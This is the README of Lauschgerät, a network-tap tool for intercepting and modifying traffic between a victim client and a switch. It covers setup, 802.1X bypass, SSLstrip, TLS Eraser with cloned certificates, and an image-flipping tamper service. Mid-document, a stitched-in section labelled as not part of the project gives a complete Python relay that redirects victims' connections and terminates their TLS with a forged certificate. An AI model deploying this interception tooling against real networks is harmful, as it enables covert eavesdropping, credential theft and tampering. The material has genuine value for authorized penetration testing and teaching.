Analyze and modify traffic without worrying about TLS or 802.1X.
Lauschgerät attempts to do most of the heavy lifting so you can focus on things that cannot be done by a machine. Get an extra ethernet cable, plug your machine between two test machines, and watch and control the traffic flowing through your machine.
The recommended distribution is Debian Stretch or newer, or Kali Linux (also on ARM). A minimal network install with just an SSH server and the standard system utilities will do.
Install the requirements:

```sh
cat requirements-system.txt | xargs sudo apt-get -y install
pip3 install --user -r requirements.txt
```
- Create a virtual machine with a network interface you can reach from your host machine (host-only if using KVM) and set up an SSH service
- Boot the device before plugging in any extra network interfaces
- Log in and make sure you can reach the internet
- Write down the name of the wireless interface, if there is one
- Now plug in the switch interface and write down the name of the new device that shows up in the output of `ip link`
- Now plug in the client interface and write down the name of the new device
- Run:

  ```sh
  install.sh -u=root -p=<PORT> <HOST> <ATIF> <CLIF> <SWIF>
  ```

  `<HOST>` and `<PORT>` are the SSH host and port of the device (`-u` sets the SSH user); `<ATIF>`, `<CLIF>` and `<SWIF>` are the attacker interface, the client interface and the switch interface.
- If something goes wrong, log in and try to fix it, then run the command again
Download a suitable image and write it to a Raspberry Pi, Banana Pi or some other compatible device. This has been tested with `2018-04-18-raspbian-stretch-lite.img` (SHA1 sum `a85ca45b0830bfa3196786061c524d93325596c0`).

To make sure you have root access via SSH and that the device has internet access, I recommend mounting the image with guestfish first to enable SSH:

```
$ guestfish -a 2018-04-18-raspbian-stretch-lite.img

Welcome to guestfish, the guest filesystem shell for
editing virtual machine filesystems and disk images.

Type: ‘help’ for help on commands
      ‘man’ to read the manual
      ‘quit’ to quit the shell

><fs> run
><fs> mount /dev/sda2 /
```

Then create a symlink to enable the SSH service at boot (`ln-s` is guestfish's symlink command), unmount, sync and leave the shell:

```
><fs> ln-s /lib/systemd/system/ssh.service /etc/systemd/system/sshd.service
><fs> umount /
><fs> sync
><fs> exit
```

Copy the image to an SD card, boot the Raspberry Pi and proceed as in variant 2.
This is a good moment to get coffee, because this step may take a while.
It should then look like this:
- Attach the victim client and the victim switch to the Lauschgerät
- If using variant 1 (network namespaces), run `lauschgeraet.py <client-interface> <switch-interface>`
- Navigate a browser to the attacker machine on port 1337
- Set the status of the Lauschgerät to `passive` by clicking the On/Off switch
- Watch the traffic with `ip netns exec lg tcpdump -i br0`, or remotely with Wireshark:

  ```sh
  ssh root@lauschgeraet ip netns exec lg tcpdump -s 0 -U -n -w - -i br0 | wireshark -k -i -
  ```

- To redirect traffic to another service, set the status of the Lauschgerät to `active`
- Run a service on the target port using the "Services" page
- Define an `iptables` rule on the "Man in the Middle" page that redirects traffic to that target port
You can run arbitrary services on the Lauschgerät to interact with your victim's traffic. Currently, you need to supply a JSON file with some basic info in order to conveniently run these services from the web interface. A proper API is planned for the next release. You're always free to start any service manually via SSH, of course.
A few examples are listed in the following section.
By default, Lauschgerät comes with JSON files for Moxie Marlinspike's SSLstrip, a self-developed TCP proxy called TLS Eraser and, as an example for how an adversary could maliciously modify traffic, Flipper, a service that turns images transferred via HTTP upside-down.
The Lauschgerät has the IP address 203.0.113.1 in the `lg` network namespace and 203.0.113.2 in the default network namespace.
By default, TLS Eraser listens on TCP port 1234. It terminates the TLS connection coming from the victim and routes the plaintext through another network namespace before forwarding it to its original destination, which is determined automatically. The detour through the other namespace exists so you can observe the unencrypted traffic with Wireshark or tcpdump.
The certificate presented to the victim is obtained via clone-cert.sh. Since that clone is not signed by a CA the victim trusts, it only gets past clients that skip certificate validation; a properly validating client will warn or refuse to connect.
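The redirect mechanism behind the "active" steps above and behind TLS Eraser (an iptables `REDIRECT` sends the victim's connection to a local port, and the service asks the kernel where the connection was originally headed) in working form, as an added example that is not part of the Lauschgerät project or TLS Eraser: it recovers the original destination via the `SO_ORIGINAL_DST` socket option, relays the bytes, and, when given a certificate and key (for instance one produced by clone-cert.sh), terminates TLS towards the victim. The `REDIRECT` rule in the docstring, the listening port 1234, the `pack_sockaddr_in` helper and the sample address 198.51.100.7 are assumptions for illustration; the detour through a second namespace that TLS Eraser makes is not reproduced here.

```python
"""Transparent TCP/TLS relay that recovers the original destination of a
connection redirected by iptables.  Added example, not Lauschgerät or TLS
Eraser code.  Assumed REDIRECT rule (the kind defined on the "Man in the
Middle" page), here sending TLS on port 443 into this relay on port 1234:

    ip netns exec lg iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 1234
"""
import socket
import ssl
import struct
import threading

SO_ORIGINAL_DST = 80   # from linux/netfilter_ipv4.h; IPv4 sockets only
LISTEN_PORT = 1234     # TLS Eraser's default port, reused for illustration


def pack_sockaddr_in(ip, port):
    """Build a struct sockaddr_in as the kernel lays it out: sa_family
    (native-endian uint16), sin_port (network-order uint16), sin_addr
    (4 bytes), 8 bytes of zero padding.  Helper for the constructed sample."""
    return (struct.pack("=H", socket.AF_INET) + struct.pack("!H", port)
            + socket.inet_aton(ip) + b"\x00" * 8)


def parse_sockaddr_in(raw):
    """Decode what getsockopt(SOL_IP, SO_ORIGINAL_DST) returns."""
    if len(raw) < 8:
        raise ValueError("sockaddr_in too short: %d bytes" % len(raw))
    (family,) = struct.unpack_from("=H", raw, 0)
    if family != socket.AF_INET:
        raise ValueError("unexpected address family %d" % family)
    (port,) = struct.unpack_from("!H", raw, 2)
    return socket.inet_ntoa(raw[4:8]), port


# Constructed sample: what the kernel would hand back for a victim that
# tried to reach 198.51.100.7:443 (documentation address, an assumption).
SAMPLE_SOCKADDR = pack_sockaddr_in("198.51.100.7", 443)


def original_destination(conn):
    """Ask netfilter where the victim really wanted to go.  On a socket that
    was not redirected, getsockopt raises OSError (ENOENT).  IPPROTO_IP is
    SOL_IP on Linux."""
    raw = conn.getsockopt(socket.IPPROTO_IP, SO_ORIGINAL_DST, 16)
    return parse_sockaddr_in(raw)


def pump(src, dst):
    """Copy bytes one way until EOF, then half-close the other side."""
    try:
        while True:
            data = src.recv(65536)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def handle(client, peer, tls_ctx):
    ip, port = original_destination(client)
    print("%s:%d -> %s:%d" % (peer[0], peer[1], ip, port))
    upstream = socket.create_connection((ip, port), timeout=10)
    upstream.settimeout(None)
    if tls_ctx is not None:
        # Terminate TLS towards the victim with our certificate and open a
        # fresh session to the real server.  Like any interceptor we do not
        # validate upstream; a real tool would also forward the victim's SNI
        # via server_hostname, which this sketch leaves out.
        client = tls_ctx.wrap_socket(client, server_side=True)
        up_ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
        up_ctx.check_hostname = False
        up_ctx.verify_mode = ssl.CERT_NONE
        upstream = up_ctx.wrap_socket(upstream)
    threading.Thread(target=pump, args=(client, upstream), daemon=True).start()
    pump(upstream, client)
    client.close()
    upstream.close()


def serve(listen_port=LISTEN_PORT, cert=None, key=None):
    """Accept redirected connections forever.  cert/key: PEM files for the
    certificate shown to the victim (e.g. from clone-cert.sh); leave both
    None to relay plain TCP."""
    tls_ctx = None
    if cert is not None:
        tls_ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
        tls_ctx.load_cert_chain(cert, key)
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("0.0.0.0", listen_port))
    srv.listen(64)
    while True:
        client, peer = srv.accept()
        threading.Thread(target=handle, args=(client, peer, tls_ctx),
                         daemon=True).start()


if __name__ == "__main__":
    serve()
```

Run it in the namespace the `REDIRECT` rule lives in (e.g. `ip netns exec lg python3 relay.py`). Two checks worth making before blaming the relay: for traffic crossing a bridge such as `br0`, iptables only sees the frames when the `br_netfilter` module is loaded and `net.bridge.bridge-nf-call-iptables` is 1, and `SO_ORIGINAL_DST` covers IPv4 only (IPv6 needs `IP6T_SO_ORIGINAL_DST` at `SOL_IPV6`).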
Run the Flipper service (analogous to TLS Eraser) to flip images:
Shout out to byt3bl33d3r!
Hidden Services
In case you want to run a service that is accessible to other members of the network, define a MitM rule such as this:

| old destination | new destination |
| --- | --- |
| `<IP of the victim client>:80` | `203.0.113.1:80` |
When running the Lauschgerät as variant 3 on dedicated hardware such as a Raspberry Pi, you can use the built-in Wi-Fi card either as a management interface or as another client interface. Simply turn on the Lauschgerät's Wi-Fi mode in the web interface; all traffic originating from wireless devices that join the Wi-Fi network will then be intercepted.
If you want to contribute, it's useful to have a good test setup. Since it's a pain to work with another physical device, let alone two more devices, let's just use the machine we're already working on (variant 1). The trick is to use yet another network namespace.

The script `testsetup.sh` creates a network namespace named `ext` as well as four virtual devices:

- `lg-eth0` replaces the interface on the attacker machine connected to the client
- `lg-eth1` replaces the interface on the attacker machine connected to the switch
- `lg-eth0-l` replaces the interface of the victim client
- `lg-eth1-l` replaces the interface of the victim switch

`lg-eth0-l` is assigned to the network namespace `ext` by the script. There needs to be a DHCP service listening on `lg-eth1-l`. It can be in the default network namespace.

To run a test, execute `./testsetup.sh ; ./lauschgeraet.py -ci lg-eth0 -si lg-eth1`. Now switch into the `ext` namespace with something like `sudo ip netns exec ext bash`. Pretend to be the victim by placing requests from this shell, preferably with `curl` or `wget`, but you can also launch a browser.

Close all shells living in this new network namespace before you delete it.
Large parts of the 802.1X bypass have been taken from Alva Duckwall's excellent talk.
- Silentbridge: https://github.com/s0lst1c3/silentbridge
- PhanTap: https://github.com/nccgroup/phantap
- Dolos Cloak
Adrian Vollmer, SySS GmbH 2018-2019
Use at your own risk. Do not use without full consent of everyone involved. For educational purposes only.